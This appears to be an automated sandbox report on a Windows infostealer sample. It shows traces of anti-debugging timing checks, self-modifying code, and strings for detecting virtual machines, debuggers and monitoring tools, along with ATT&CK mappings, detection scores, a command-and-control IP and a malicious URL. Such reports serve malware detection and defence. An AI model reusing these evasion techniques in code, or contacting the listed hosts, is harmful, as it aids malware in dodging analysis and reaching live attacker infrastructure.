0x00000040 pushad 0x00000041 push esi 0x00000042 pop ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160F4E second address: 7160F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F43E8C1FDE5h 0x0000000b pop eax 0x0000000c popad 0x0000000d mov dword ptr [edx+0Ch], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F43E8C1FDE8h 0x00000019 xor ax, 1938h 0x0000001e jmp 00007F43E8C1FDDBh 0x00000023 popfd 0x00000024 mov bl, cl 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7160F9E second address: 7161032 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43E91C5460h 0x00000009 add cl, FFFFFF98h 0x0000000c jmp 00007F43E91C545Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F43E91C5468h 0x00000018 jmp 00007F43E91C5465h 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 mov eax, dword ptr [esi+10h] 0x00000024 pushad 0x00000025 movzx ecx, bx 0x00000028 mov di, D16Ch 0x0000002c popad 0x0000002d mov dword ptr [edx+10h], eax 0x00000030 jmp 00007F43E91C545Bh 0x00000035 mov eax, dword ptr [esi+14h] 0x00000038 pushad 0x00000039 mov di, si 0x0000003c push ecx 0x0000003d pushad 0x0000003e popad 0x0000003f pop edi 0x00000040 popad 0x00000041 mov dword ptr [edx+14h], eax 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F43E91C5462h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161032 second address: 7161041 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161041 second address: 7161047 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161047 second address: 716111B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f jmp 00007F43E8C1FDE9h 0x00000014 popad 0x00000015 mov dword ptr [edx+18h], eax 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F43E8C1FDDCh 0x0000001f xor si, 7EA8h 0x00000024 jmp 00007F43E8C1FDDBh 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F43E8C1FDE8h 0x00000030 xor cl, 00000008h 0x00000033 jmp 00007F43E8C1FDDBh 0x00000038 popfd 0x00000039 popad 0x0000003a mov eax, dword ptr [esi+1Ch] 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007F43E8C1FDE4h 0x00000044 jmp 00007F43E8C1FDE5h 0x00000049 popfd 0x0000004a mov ebx, esi 0x0000004c popad 0x0000004d mov dword ptr [edx+1Ch], eax 0x00000050 jmp 00007F43E8C1FDDAh 0x00000055 mov eax, dword ptr [esi+20h] 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b pushfd 0x0000005c jmp 00007F43E8C1FDDDh 0x00000061 jmp 00007F43E8C1FDDBh 0x00000066 popfd 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716111B second address: 7161121 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161121 second address: 716118B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+20h], eax 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 pushfd 0x00000012 jmp 00007F43E8C1FDDAh 0x00000017 sub al, FFFFFF88h 0x0000001a jmp 00007F43E8C1FDDBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+24h] 0x00000024 jmp 00007F43E8C1FDE6h 0x00000029 mov dword ptr [edx+24h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F43E8C1FDE7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716118B second address: 7161191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161191 second address: 7161195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161195 second address: 7161199 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161199 second address: 716120A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+28h] 0x0000000b pushad 0x0000000c movsx edi, si 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 mov dword ptr [edx+28h], eax 0x00000016 pushad 0x00000017 mov dx, E342h 0x0000001b pushfd 0x0000001c jmp 00007F43E8C1FDE3h 0x00000021 or ax, DA3Eh 0x00000026 jmp 00007F43E8C1FDE9h 0x0000002b popfd 0x0000002c popad 0x0000002d mov ecx, dword ptr [esi+2Ch] 0x00000030 jmp 00007F43E8C1FDDEh 0x00000035 mov dword ptr [edx+2Ch], ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F43E8C1FDDAh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716120A second address: 716120E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716120E second address: 7161214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161214 second address: 7161241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43E91C545Ch 0x00000008 push esi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ax, word ptr [esi+30h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F43E91C5463h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161241 second address: 7161259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161259 second address: 716126B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov cx, dx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716126B second address: 7161283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov bx, cx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161283 second address: 7161287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161287 second address: 7161295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ax, word ptr [esi+32h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161295 second address: 71612CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushfd 0x00000009 jmp 00007F43E91C5465h 0x0000000e or ax, 6CA6h 0x00000013 jmp 00007F43E91C5461h 0x00000018 popfd 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71612CA second address: 71612F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov word ptr [edx+32h], ax 0x00000009 jmp 00007F43E8C1FDDDh 0x0000000e mov eax, dword ptr [esi+34h] 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 mov dword ptr [edx+34h], eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f movsx ebx, ax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71612F4 second address: 7161333 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 61909CAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F43E91C5464h 0x0000000f jmp 00007F43E91C5465h 0x00000014 popfd 0x00000015 popad 0x00000016 test ecx, 00000700h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 7161333 second address: 71613A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43E8C1FDE0h 0x00000009 sub ecx, 007EB968h 0x0000000f jmp 00007F43E8C1FDDBh 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a jne 00007F4458F9E18Fh 0x00000020 pushad 0x00000021 mov cx, 1CF1h 0x00000025 pushfd 0x00000026 jmp 00007F43E8C1FDDEh 0x0000002b xor ax, 0BC8h 0x00000030 jmp 00007F43E8C1FDDBh 0x00000035 popfd 0x00000036 popad 0x00000037 or dword ptr [edx+38h], FFFFFFFFh 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F43E8C1FDE0h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71613A2 second address: 71613B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C545Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71613B1 second address: 71613B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71613B7 second address: 71613BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71613BB second address: 71613BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71613BF second address: 71613D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71613D1 second address: 71613D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71613D5 second address: 71613D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71613D9 second address: 71613DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71613DF second address: 71613F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E91C545Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71613F1 second address: 716141B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+40h], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F43E8C1FDE8h 0x00000014 push eax 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 716141B second address: 7161464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43E91C545Dh 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ax, di 0x00000014 pushfd 0x00000015 jmp 00007F43E91C545Bh 0x0000001a add ecx, 1D35478Eh 0x00000020 jmp 00007F43E91C5469h 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71B0A2F second address: 71B0A5E instructions: 0x00000000 rdtsc 0x00000002 mov cx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebp 0x00000009 jmp 00007F43E8C1FDDAh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F43E8C1FDE7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71B0A5E second address: 71B0A8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E91C5469h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F43E91C545Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 70F05C4 second address: 70F05D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F43E8C1FDDBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 70F05D3 second address: 70F05D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 70F05D7 second address: 70F0616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F43E8C1FDE4h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov si, bx 0x00000015 call 00007F43E8C1FDE9h 0x0000001a pop eax 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 70F09E8 second address: 70F09F2 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov ah, E7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71408D6 second address: 71408F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43E8C1FDE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRDTSC instruction interceptor: First address: 71408F3 second address: 714097E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F43E91C5467h 0x00000009 adc si, BB2Eh 0x0000000e jmp 00007F43E91C5469h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F43E91C5460h 0x0000001a sbb esi, 3CD910A8h 0x00000020 jmp 00007F43E91C545Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F43E91C5466h 0x0000002f push eax 0x00000030 jmp 00007F43E91C545Bh 0x00000035 xchg eax, ebp 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 mov dh, 4Bh 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSpecial instruction interceptor: First address: C8B250 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSpecial instruction interceptor: First address: C9BA06 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSpecial instruction interceptor: First address: D0F926 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_006B9980 rdtsc 0_2_006B9980
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exe TID: 7536Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004D29FF
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_004D255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_004D255D
Source: Cc8zEnIDB2.exe, Cc8zEnIDB2.exe, 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Cc8zEnIDB2.exe, 00000000.00000003.1338130046.0000000001882000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!!=
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Cc8zEnIDB2.exeBinary or memory string: Hyper-V RAW
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Cc8zEnIDB2.exe, 00000000.00000003.1340021481.00000000069E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlU9
Source: Cc8zEnIDB2.exe, 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Cc8zEnIDB2.exe, 00000000.00000003.1386073978.00000000072D1000.00000004.00000020.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1398201242.0000000007340000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_071903E6 Start: 07190B90 End: 071904570_2_071903E6
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile opened: NTICE
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile opened: SICE
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeCode function: 0_2_006B9980 rdtsc 0_2_006B9980
Source: Cc8zEnIDB2.exe, Cc8zEnIDB2.exe, 00000000.00000002.1395770755.0000000000C6B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ^Program Manager
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Cc8zEnIDB2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: Cc8zEnIDB2.exe, 00000000.00000003.1302588655.000000000730F000.00000004.00001000.00020000.00000000.sdmp, Cc8zEnIDB2.exe, 00000000.00000002.1395232706.0000000000980000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49709 -> 194.87.47.113:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Cc8zEnIDB2.exe53%VirustotalBrowse
Cc8zEnIDB2.exe45%ReversingLabsWin32.Infostealer.Tinba
Cc8zEnIDB2.exe100%AviraTR/Crypt.TPM.Gen
Cc8zEnIDB2.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF100%Avira URL Cloudmalware
